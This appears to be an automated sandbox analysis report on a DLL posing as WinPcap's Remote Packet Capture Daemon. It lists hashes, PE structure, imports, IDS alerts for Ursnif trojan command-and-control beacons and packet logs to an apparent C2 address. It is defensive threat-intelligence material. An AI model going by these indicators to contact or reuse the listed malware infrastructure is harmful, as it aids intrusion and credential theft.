SSDEEP: | 6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy |
MD5: | 248E15CD19191D4333303E0E1F8E9A70 |
SHA1: | 9896EF9708F81AE4E3F2CA86329AD6BD82C700C3 |
SHA-256: | 0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF |
SHA-512: | 8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 351 |
Entropy (8bit): | 5.233616509891766 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fOQcqzxs7+AEszIWXp+N23fOQcdx:p37Lvkmb6KHX9WZE8XY |
MD5: | B09FC03F6F32FD7BFF1678B20710EACC |
SHA1: | 44DED5B7DD42B6C22CA7C448AB9114A8EA0DFCF8 |
SHA-256: | 008CD3ECE05E43CF30AA9A824086D2C74AED968A198DC5CDBC27BC4548C8AA68 |
SHA-512: | 387C45C7B6465B407CF53F09EB87F0E0D6D0A71958591D7D2667CE322B7CF927B2AB2079DFD2F892C6B71CCFC201182B43DB85F48B87583F2F8635D1B4B1F730 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6358141485539535 |
Encrypted: | false |
SSDEEP: | 24:etGSLm8+mUE7R853RY0kCGZ+4I4tkZffADZ0WI+ycuZhNs+akSnfPNnq:6LwXE7S50aJfOZX1uls+a3n9q |
MD5: | 94A8127680C746FAE1D7DF8EAB442F71 |
SHA1: | 4DBA9B41BAD4BB6C030C764095E435765127EBF5 |
SHA-256: | 4CFF361908979C591DBF57968B86BB2F44E38C91FE906AD376DC70353FB59579 |
SHA-512: | 7D6CD3375503B217FC269FF923F1D88C27AE7912AC34C6AA8CAB990A0745576E02FB09B9B9D74D8ECAF7849F0FF19E8A95D9124BCFC888FDFA53EF840D8FC516 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 848 |
Entropy (8bit): | 5.3155037212616865 |
Encrypted: | false |
SSDEEP: | 12:xKIR37Lvkmb6KHX9WZE8XNKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHCE89KaM5DqBVKVrdFAMBJTH |
MD5: | F380E8169FAA19FC8CCFCEEC54390870 |
SHA1: | 327BC06BDF17F5075A0F3DD4EAAB85538EB55385 |
SHA-256: | 373B54E6175914A5E03ED5C10E9293B59CB6F65B8DFCB496F3616351CB3065E2 |
SHA-512: | 353240D429BAF32998D1E99AB22D6F8C8E097A74671394799B6EB87BBF51F1123748CE55689EFF37A28CFDFE9135C942EA54ED99CBA43EB6F6E3DD248B8DB7AA |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220422\PowerShell_transcript.210979.yN_Qw8z3.20220422153314.txt
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1359 |
Entropy (8bit): | 5.402564603202913 |
Encrypted: | false |
SSDEEP: | 24:BxSAqhxvBnD0x2DOXUWhpW0i5IPTLCHYt4qW+HjeTKKjX4CIym1ZJXi9pW0i5IPo:BZkvhD0oOBNi5I4Yt4t+qDYB1ZSNi5Iw |
MD5: | C169E3B2744936B4A87A09EE7EEB0838 |
SHA1: | 8EEE154E1E17280881C7B5A038D5920A642378D9 |
SHA-256: | 241713E498DC5947C5110F802DF0D475C8402A98E29A74F914C9E689D2014D85 |
SHA-512: | 969FBC4B7425CD0E75A2C8B56741467EA283CD4876F9D60901623E5E29B94F0FA55828D10172D20F82ED0451D74C6C63FBCD6E136C97A9DED9E6A426805DB508 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.117696934685876 |
TrID: |
|
File name: | pDut.dll |
File size: | 641885 |
MD5: | b8eea1c2963c2f26ff4ffe8de869c3cc |
SHA1: | 2a8a13db7afd001f093a2c6f82bc6ed93b1884c5 |
SHA256: | 86ef41e44779b109e70b7d34c011b341c2d90654b149a718a380205287256bef |
SHA512: | e1d4583f769c996b99787c662fe12575f4242ad5ac2251ed3bc9c4d6129794a716493342f9bc207bc4f3e0736ae351a5bbd7c03e36ea2d3fd6e5e51f0abf8a65 |
SSDEEP: | 12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZFB:+w1lEKOpuYxiwkkgjAN8ZFB |
TLSH: | 65D4BD1A029B2102EBB6CE78A751636C55174CE09B01E2CFC9190DA395E34FBF4FA5ED |
File Content Preview: | MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{....................... |
Icon Hash: | 74f0e4ecccdce0e4 |
Entrypoint: | 0x401023 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | fd1c62e6f93e304a27347077f6d2b44c |
Signature Valid: | |
Signature Issuer: | |
Signature Validation Error: | |
Error Number: | |
Not Before, Not After | |
Subject Chain | |
Version: | |
Thumbprint MD5: | |
Thumbprint SHA-1: | |
Thumbprint SHA-256: | |
Serial: |
Instruction |
---|
jmp 00007FBA34B84A1Dh |
jmp 00007FBA34BB5188h |
jmp 00007FBA34B84703h |
jmp 00007FBA34B843BEh |
jmp 00007FBA34B847D9h |
jmp 00007FBA34B84214h |
jmp 00007FBA34BBA5FFh |
jmp 00007FBA34B8431Ah |
jmp 00007FBA34BAD975h |
jmp 00007FBA34BBD830h |
jmp 00007FBA34BB949Bh |
jmp 00007FBA34BBE9F6h |
jmp 00007FBA34B84291h |
jmp 00007FBA34BAEAACh |
jmp 00007FBA34BC10C7h |
jmp 00007FBA34BB8372h |
jmp 00007FBA34BAFB2Dh |
jmp 00007FBA34B84748h |
jmp 00007FBA34BC4063h |
jmp 00007FBA34B8446Eh |
jmp 00007FBA34BBFC29h |
jmp 00007FBA34BB6254h |
jmp 00007FBA34BB0B3Fh |
jmp 00007FBA34BBFA4Ah |
jmp 00007FBA34B846E5h |
jmp 00007FBA34BBB620h |
jmp 00007FBA34BB307Bh |
jmp 00007FBA34BC3186h |
jmp 00007FBA34BB1F41h |
jmp 00007FBA34B846DCh |
jmp 00007FBA34B84257h |
jmp 00007FBA34BBC762h |
jmp 00007FBA34BC20DDh |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_VERSION | 0x98170 | 0x3d0 | data |
DLL | Import |
---|---|
WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification |
msvcrt.dll | toupper |
USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW |
OLEAUT32.dll | LHashValOfNameSysA |
SHELL32.dll | FindExecutableW |
KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA |
Secur32.dll | InitializeSecurityContextW |
ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner |
GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW |
Description | Data |
---|---|
LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino. |
InternalName | rpcapd |
FileVersion | 4.0.0.1040 |
CompanyName | CACE Technologies |
LegalTrademarks | |
ProductName | WinPcap |
ProductVersion | 4.0.0.1040 |
FileDescription | Remote Packet Capture Daemon |
Build Description | |
OriginalFilename | rpcapd.exe |
Translation | 0x0000 0x04b0 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/22/22-15:33:01.649952 04/22/22-15:33:01.649952 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
04/22/22-15:32:39.565574 04/22/22-15:32:39.565574 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49728 | 80 | 192.168.2.3 | 13.107.43.16 |
04/22/22-15:32:59.896476 04/22/22-15:32:59.896476 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
04/22/22-15:33:00.692984 04/22/22-15:33:00.692984 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 22, 2022 15:32:59.871845007 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:32:59.895606041 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:32:59.895781994 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:32:59.896476030 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:32:59.920144081 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272408009 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272459984 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272480965 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272505999 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272524118 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272547960 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272556067 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.272567034 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272583961 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272604942 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272614956 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.272629023 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272644997 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272684097 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.272768021 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272794008 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272810936 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.272824049 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.272861958 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.296608925 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.296816111 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.312743902 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.312794924 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.312813997 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.312839031 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313033104 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.313118935 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313153982 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313191891 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.313196898 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313222885 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313247919 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313265085 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313283920 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.313308954 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313337088 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.313349962 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313366890 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313400030 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.313410997 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313430071 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.313457966 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.313462019 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313481092 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313510895 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.313522100 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.313565969 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.320457935 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.320684910 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.353060961 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353101969 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353115082 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353128910 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353142977 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353250027 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353283882 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.353296041 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353312969 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353332043 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353432894 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.353696108 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353728056 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353740931 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353763103 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.353780031 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353796959 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353809118 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.353843927 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.353897095 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.354078054 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.354100943 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.354114056 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.354136944 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.354191065 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.377305984 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.377413988 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.393491983 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.393522978 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.393536091 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.393552065 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.393569946 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.393582106 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.393619061 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.393678904 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.393724918 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.393743992 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.393755913 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.393769026 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.393785000 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.393802881 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.393814087 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.393851042 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.393878937 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.394093037 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.394144058 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.394154072 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.394190073 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.394196033 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.394201994 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.394243002 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.394423962 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.394469023 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.401122093 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.401309013 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.434287071 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.434322119 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.434335947 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.434353113 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.434370041 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.434381962 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.434396982 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.434431076 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.434797049 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.434819937 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.434833050 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.434849977 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.434863091 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.434866905 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.434880018 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.434892893 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.434936047 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.435045004 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.435065031 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.435076952 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.435094118 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.435096025 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.435118914 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.435132980 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.435133934 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.435163975 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.435324907 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.435348034 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.435359955 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.435386896 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.435393095 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.435426950 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.435427904 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.435456038 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.435484886 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.474493027 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.474526882 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.474539042 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.474555969 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.474570036 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.474654913 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.474673033 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.474685907 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.474703074 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
